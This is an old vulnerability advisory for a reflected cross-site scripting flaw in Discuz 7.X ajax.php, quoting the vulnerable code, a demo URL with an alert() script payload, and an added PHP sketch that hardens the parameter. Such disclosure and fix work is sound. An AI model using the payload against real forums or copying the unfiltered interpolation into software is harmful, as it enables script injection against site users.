Discuz 7.X registration verification code XSS cross-site scripting vulnerability

2010-03-16T00:00:00
ID MYHACK58:62201026450
Type myhack58
Reporter Anonymous
Modified 2010-03-16T00:00:00

Description

Vulnerable file: ajax.php. Code excerpt:

    // Excerpt from ajax.php (action=updateseccode). It begins inside enclosing
    // if-blocks that are not shown on the page. $secchecktype is taken from the
    // request and placed into the HTML and the inline script without filtering.
    $message = '<span id="seccodeswf_'.$secchecktype.'"></span>'.(extension_loaded('ming') ?
        "<script type=\"text/javascript\" reload=\"1\">\n$('seccodeswf_$secchecktype').innerHTML=AC_FL_RunContent('width', '$seccodedata[width]', 'height', '$seccodedata[height]', 'src', 'seccode.php?update=$rand', 'quality', 'high', 'wmode', 'transparent', 'bgcolor', '#ffffff', 'align', 'middle', 'menu', 'false', 'allowScriptAccess', 'sameDomain');\n</script>" :
        "<script type=\"text/javascript\" reload=\"1\">\n$('seccodeswf_$secchecktype').innerHTML=AC_FL_RunContent('width', '$seccodedata[width]', 'height', '$seccodedata[height]', 'src', '{$boardurl}images/seccode/flash/flash2.swf', 'FlashVars', 'sFile={$boardurl}seccode.php?update=$rand', 'menu', 'false', 'allowScriptAccess', 'sameDomain', 'swLiveConnect', 'true');\n</script>");
    } elseif($seccodedata['type'] == 3) {
        // Same unfiltered value, again inside both the span id and the script
        $flashcode = "<span id=\"seccodeswf_$secchecktype\"></span><script type=\"text/javascript\" reload=\"1\">\n$('seccodeswf_$secchecktype').innerHTML=AC_FL_RunContent('id', 'seccodeplayer', 'name', 'seccodeplayer', 'width', '0', 'height', '0', 'src', '{$boardurl}images/seccode/flash/flash1.swf', 'FlashVars', 'sFile={$boardurl}seccode.php?update=$rand', 'menu', 'false', 'allowScriptAccess', 'sameDomain', 'swLiveConnect', 'true');\n</script>";
        $message = 'seccode_player';
    } else {
        $message = '<img width="'.$seccodedata['width'].'" height="'.$seccodedata['height'].'" src="seccode.php?update='.$rand.'" class="absmiddle" alt="" />';
    }
    }
    // The assembled markup is echoed back to the browser
    showmessage($message);

Trigger condition: on 7.X forums that have the registration verification code enabled, submitting a crafted URL to this path produces an XSS of limited practical value.

Vulnerability demo address: http://www.nohack.cn/bbs/ajax.php?action=updateseccode&secchecktype=%22><script>alert(/qing passing test/)</sCript>

Code: bbs/ajax.php?action=updateseccode&secchecktype=%22><script>alert(/qing passing test/)</sCript>

Patch: none.

Note: IE8 blocks this; test on a version below IE8. It also works in Firefox.
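The excerpt writes the request-supplied $secchecktype into both an HTML attribute and an inline script, and no patch is listed. The sketch below shows the unfixed pattern beside a hardened form; it is an added example, not Discuz code or an official fix. The function names are hypothetical, and it assumes the parameter is only ever meant to be a small integer flag.

```php
<?php
// Added example (not Discuz code). All function names here are hypothetical.

// Allow-list validation. Assumption: secchecktype is a small integer flag,
// so anything that is not 1-3 digits collapses to 0. Because the result is an
// int, it is safe in both sinks of the excerpt: the id="..." attribute and
// the $('seccodeswf_...') string inside the inline script.
function safe_secchecktype($raw) {
    return (is_string($raw) && preg_match('/^\d{1,3}$/', $raw)) ? (int)$raw : 0;
}

// Unfixed pattern from the excerpt: the request value is concatenated as-is.
function span_vulnerable($secchecktype) {
    return '<span id="seccodeswf_'.$secchecktype.'"></span>';
}

// Hardened: validate first, then still encode for the attribute context so
// the output stays safe even if the allow-list is loosened later.
function span_hardened($raw) {
    $id = 'seccodeswf_'.safe_secchecktype($raw);
    return '<span id="'.htmlspecialchars($id, ENT_QUOTES, 'UTF-8').'"></span>';
}

// True when request input managed to introduce its own markup.
function injects_markup($html) {
    return stripos($html, '<script') !== false;
}

// Constructed sample inputs: a normal value, the URL-decoded value from the
// demo address above, and a non-numeric string.
$samples = array('1', '"><script>alert(/qing passing test/)</sCript>', 'abc');

foreach ($samples as $raw) {
    $v = span_vulnerable($raw);
    $h = span_hardened($raw);
    printf("input:      %s\n", $raw);
    printf("vulnerable: %s  [%s]\n", $v, injects_markup($v) ? 'INJECTED' : 'ok');
    printf("hardened:   %s  [%s]\n\n", $h, injects_markup($h) ? 'INJECTED' : 'ok');
}
```

The same validation has to be applied before the value reaches the `$flashcode` branch as well, since that branch interpolates the variable independently of `$message`.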
